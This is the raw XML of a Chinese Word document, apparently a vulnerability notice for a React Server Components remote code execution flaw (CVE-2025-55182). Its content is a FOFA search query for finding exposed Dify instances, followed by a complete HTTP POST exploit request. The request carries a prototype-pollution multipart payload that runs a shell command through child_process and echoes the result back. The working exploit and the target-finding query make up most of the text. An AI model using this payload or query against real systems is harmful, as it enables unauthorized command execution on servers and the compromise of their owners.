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E51E0">
      <w:pP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7"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26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7"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>React Server Components 远程代码执行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7"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞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7"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(CVE-2025-5518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7"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2）</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="4E5FBA1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FOFA：app="Dify"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2AE191">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ACC6F80">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53A64B1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回显RCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE99083">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="540B5D5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POST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/apps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13AF045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  <w:lang w:val="en-US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</w:p>
    <w:p w14:paraId="5775E0A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Chrome/60.0.3112.113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Assetnote/1.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0310087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Next-Action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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D5F02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X-Nextjs-Request-Id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b5dce965</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D71F3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814662"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016D30B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X-Nextjs-Html-Request-Id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SSTMXm7OJ_g0Ncx6jpQt9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652AA84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Content-Length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565</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4608B60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</w:p>
    <w:p w14:paraId="64F80C5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------WebKitFormBoundaryx8jO2oVc6SWP3Sad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E3E5DF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Content-Disposition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form-data;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name="0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E8746B">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="693279E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{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('id').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6BE9D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------WebKitFormBoundaryx8jO2oVc6SWP3Sad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAF609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Content-Disposition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form-data;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name="1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F28F4E">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FBC720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"$@0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC2EE0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------WebKitFormBoundaryx8jO2oVc6SWP3Sad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235F497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Content-Disposition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form-data;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name="2"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1543F270">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62D8B32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[]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF895B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------WebKitFormBoundaryx8jO2oVc6SWP3Sad--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D0951B">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47B74A05">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="009C917C">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08E4C74A">
      <w:pP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7"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01674ECD">
      <w:pP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spacing w:val="7"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AD9909E"/>
    <w:p w14:paraId="110E440B"/>
    <w:p w14:paraId="17B2106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3353"/>
    <w:rsid w:val="227F4C03"/>
    <w:rsid w:val="27435A51"/>
    <w:rsid w:val="327F52DC"/>
    <w:rsid w:val="4E677448"/>
    <w:rsid w:val="6098280F"/>
    <w:rsid w:val="656F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68</Words>
  <Characters>1071</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1106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2025-12-05T03:30:00Z</dcterms:created>
  <dc:creator>m1813</dc:creator>
  <cp:lastModifiedBy>追梦轩</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-23T08:11:37Z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4A19278B6F87410985CF1959EA4EE429_12</vt:lpwstr>
  </property>
</Properties>
</file>